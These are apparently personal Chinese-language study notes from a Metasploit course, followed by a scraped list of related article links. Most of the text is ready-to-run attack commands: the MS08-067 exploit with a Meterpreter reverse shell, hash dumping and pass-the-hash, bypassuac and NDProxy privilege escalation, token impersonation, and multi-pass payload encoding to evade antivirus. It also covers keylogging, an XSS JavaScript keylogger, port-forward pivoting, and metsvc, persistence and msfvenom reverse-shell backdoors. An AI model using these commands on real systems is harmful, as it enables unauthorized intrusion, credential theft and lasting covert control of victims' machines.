T00LS(第一季)
介绍
metasploit 免费版和收费版区别有生成报告功能,免杀效果。
可申请收费版试用。
更新 msfupdate,最新版此命令不能实用,使用apt-get update进行更新。
安装目录 /usr/share/metasploit-framework/
端口扫描
可以直接使用nmap命令扫描
可以使用db_nmap命令扫描
可以使用自带模块扫描
search portscan
SMB扫描获取系统信息
use auxiliary/scanner/smb/smb_version
set rhosts 193.193.193.155
run
服务识别
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ftp/ftp_version
密码嗅探
use auxiliary/sniffer/psnuffle
抓取数据包
支持ftp imap pop3 smb http
snmp扫描与枚举
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
SMB登陆验证
use auxiliary/scanner/smb/smb_login
set rhosts
set SMBUser
set SMBPass /非必填项
VNC登陆验证
use auxiliary/scanner/vnc/vnc_none_auth
WMAP Web扫描
load wmap
wmap_sites -h #查看帮助
wmap_sites -a www.0.com
wmap-sites -l
wmap-target -h #查看帮助
wmap-target -t http://www.0.com
wmap-tartget -l
wmap_run -h #查看帮助
wmap_run -t
wmap_run -e
wmap_vulns -l
T00LS(第二季)
远程代码执行
ms08_067漏洞
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
info
show targets
set targets(设置目标版本,08067漏洞不会自动判断目标版本信息)
run
midi远程代码执行
12-004
口令安全
use auxiliary/scanner/mysql/mysql_login
事先准备一个字典
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ftp/ftp_login
HASH值传递渗透
获得shell之后
meterpreter>hashdump
也可以直接使用hash值进行登陆
NDProxy内核提权
前提条件,必须有一个会话,比如已获得一个普通用户,想提上到管理员权限。
search 14-002 利用这个漏洞进行提权
use exploit/windows/local/ms_ndproxy
set session 1
对会话id为1的会话进行提权。
run
也可以使用getsystem
多种后门生成
windows后门 exe或com文件
linux后门 可执行文件
java后门 jar包
php后门 上传php文件以后访问此页面就可以打开。
jsp后门 jsp页面
asp后门 asp页面
aspx后门 aspx页面
android后门 apk包
内网渗透
获得会话以后可以对所在网段进行扫描,
run get_local_subnets
run autoroute -s 192.168.0.0/24
run autoroute -p

域环境,劫持域认证
load incognito
list_tokens -u
impersonate_token admin/wing
shell
嗅探
反反病毒(免杀)

  1. 加壳方式
  2. 编码的方式
  3. 可以用多重编码
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=2222 R | msfencode -e x86/shikate_ga_nai -c 10 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /123.exe
    也可以同时绑定一个正常文件。
    upx进行加壳,加壳
    metasploit使用编码的方式进行免杀,免费版效果很差。
    因为每一次更新杀毒厂家都会跟进。
    XSS
    search keylogger
    use auxiliary/server/capture/http_javascript_keylogger(仅键盘记录)
    options里有一个demo选项。
    有一个demo,可以记录用户输入信息,也可以复制一个站点,把代码注入到页面里。
    维持访问
    Meterpreter提供2种方式的后门,一种是通过服务启动(metsvc),一种是通过启动项启动(persistence)。
    种植后门前提是必须有一个会话,已经连接到被控制端。
    meterpreter>run metsvc -A
    这样就获得了一个后门,即使断开连接,后门也在。
    msf> use exploit/multi/handler
    set PAYLOAD windows/metsvc_bind_tcp
    show options
    set
    run

服务启动方式在xp上不成功,需要服务器版操作系统。
meterpreter>keyscan_start #键盘记录
meterpreter>keyscan_dump #查看记录
 通过服务(metsvc)启动的方式,其优点便是命令简单方便。使用此方式的后门不进行反弹回连,因此不必设置太多参数。该后门在目标机器启动后自启动一个”服务器”来等待黑客连接,因此黑客可以随时随地通过该后门进入目标机器,十分简单方便。当然,其缺点也十分明显。当其他黑客使用扫描软件扫出该”服务器”的存在时,任何人便可以通过该后门直达目标机器内部。毫无安全性可言。
 通过启动项启动(persistence)的方式,其缺点便是参数较为复杂,当设置某项参数后,很有可能因为权限问题导致该设置项并未生效,并且无错误回显,导致持续化控制可能失败,功败垂成。当然,其优点也可圈可点。该方式是在目标机器上以反弹回连方式来连接黑客的”服务器”,目标机器上的防火墙对于此等操作一般均会放行,因此后门的存活率较高,黑客只需坐等羔羊送上门来。
T00LS(第三季)
介绍
数据库连接信息 usr/share/metasploit-framework/config/database.yml
meterpreter>run vnc
监控桌面

load命令
msf > load nessus 加载nessus
nessus_connect
nessus_connect admin:passwd@127.0.0.1:8834
nessus_policy_list
nessus_scan_new
nessus_scan_lauch
nessus_scan_details
nessus_scan_export
nessus_report_download

load db_autopwn
自动攻击

load mimikatz
mimikatz
内网dns劫持
别的章节有介绍

Metasploit辅助功能
rsync
Linux下实现远程同步的软件,由于安全意识淡薄可能存在可利用的漏洞或信息。
port:873

svn
search svn

seaysvn漏洞利用工具
提权及端口转发
mimikatz_command

rdesktop ip -f -a 32
如果目标主机在内网,不能用rdp连接,可以使用端口转发
meterpreter>portfwd -l 8888 -r 目标主机ip -p 3389
rdesktop -a 32 127.0.0.1:8888 -u admin -p admin888
portfwd -delete -l 8888
火狐浏览器命令执行和flash攻击
use exploit/multi/browser/adobe_flash_hacking_team_uaf
set PAYLOAD windows/meterpreter/revrse_tcp
show options
set lhost

use exploit/multi/browser/fire_proxy_prototype
这个exploit不需要设置payload
show options
set lhost
win10提权
migrate在win10下会失败,getsystem也会失败。可以通过bypassuac提权
win10得到会话以后执行getsystem会提示失败。
getsystem -t 1
getsystem -t 2
getsystem -t 3
都会失败
可以先执行background,挂起会话。
use exploit/windows/local/bypassuac_injection
show options
set sessions
set targets 0
exploit
meterpreter>getsystem
破解linux ftp
search vsftp
use
set
好像不需要设置payload,已经获得shell了。
靶机环境
以后再看网上资料
留linux持续性后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f elf -o /root/backdoor

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set
run

meterpreter>download /root/.profile /tmp
实际上是在porfile里增加一条执行命令。
不过linux下杀毒软件几乎都不装可以使用backdoor的木马进行持久性后门生成。

T00LS MSF笔记相关推荐

  1. 2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)

    欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注 masscan扫描 kali@kali:~$ sudo masscan -p 1-65535 ...

  2. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

  3. 网络安全笔记-MSF

    文章目录 Metasploit 简介 Metasploit技术架构 Metasploit渗透阶段 Metasploit使用命令 常用的命令 1.核心命令中的 connect 命令 2.模块相关的命令s ...

  4. 内网渗透笔记——msf

    Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟 nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000    ...

  5. T00ls - Metasploit 教程 笔记

    为什么80%的码农都做不了架构师?>>>    Backtrack里面打开Metasploit: msfconsole 更新: msfupdate扫描端口: nmap -v -sV ...

  6. msf ms17-010利用笔记

    nmap -sV -Pn xxxxx  扫描端口and系统信息 use auxiliary/scanner/smb/smb_ms17_010   扫描模块 set Rhosts 扫描目标 use ex ...

  7. windows opensshd 连接就close_基于Windows白名单执行Payload上线Metasploit 渗透红队笔记...

    渗透攻击红队 一个专注于红队攻击的公众号 大家好,这里是 渗透攻击红队 的第 17 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深), 不出意外每天一更 基于白名单绕过 测试环境 攻击机 ...

  8. 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器

    这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...

  9. 构建之法读书笔记03

    构建之法读书笔记03 阅读之前:   我发现这本书我越往后读越是后期软件方面的东西,好多东西因为我之前没有接触过软件,所以都变得晦涩难懂,但是大体意思我也应该明白.我知道微软但是不曾设想过他的工作体系 ...

最新文章

  1. FastCGI与php-fpm
  2. 收藏 | 精选11篇AI领域论文(附代码、数据集链接)
  3. python基础高频_面试题(一)
  4. 趣味程序之古典与经典问题系列
  5. 优雅数据结构-BloomFilter
  6. Django Model View Template 之间的简单交互 (二)
  7. 统计二进制中1的个数(四种方案)
  8. 蓝海灵豚医疗器械管理软件隐形眼镜专版
  9. 身份证号归属地 在线查询服务 api
  10. (保姆级教程)免费将pdf转化为word文档,不限页数
  11. ThingsBoard 添加指定客户首页展示仪表板功能
  12. Ubuntu Server 18.04 WiFi配置静态ip
  13. OpenCV总结6——stitcher
  14. python-基础语法-glob.glob()
  15. Stealth-Persist混合内存系统中持久应用程序的体系结构支持
  16. 总结前端好用的ui框架,做开发非常的奈斯,总有一款你喜欢。
  17. 关于javaweb项目不能删除jir包解决
  18. 三星获欧洲专利居业内之首 中兴首次进入前十
  19. strcmp与stricmp区别
  20. 计算机专业留学个人陈述模板,个人陈述 留学|计算机专业留学个人陈述

热门文章

  1. 用vc++穷举windows应用程序密码(上)
  2. 《华杉讲透孙子兵法》分享
  3. 字幕制作之时间轴制作(1) - 字幕的无中生有
  4. rimraf : 无法加载文件 C:\Users\Admin\AppData\Roaming\npm\rimraf.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅
  5. 论文笔记:AutoAugment
  6. 运放自激震荡的大杂烩总结
  7. 负反馈放大电路中自激振荡消除方法
  8. 保研面试/考研复试中文自我介绍模板(30秒、1分钟、2分钟、3分钟)
  9. 台式关掉计算机不断网,笔记本电脑在关掉屏幕后不断网设置方法
  10. dell电脑驱动安装失败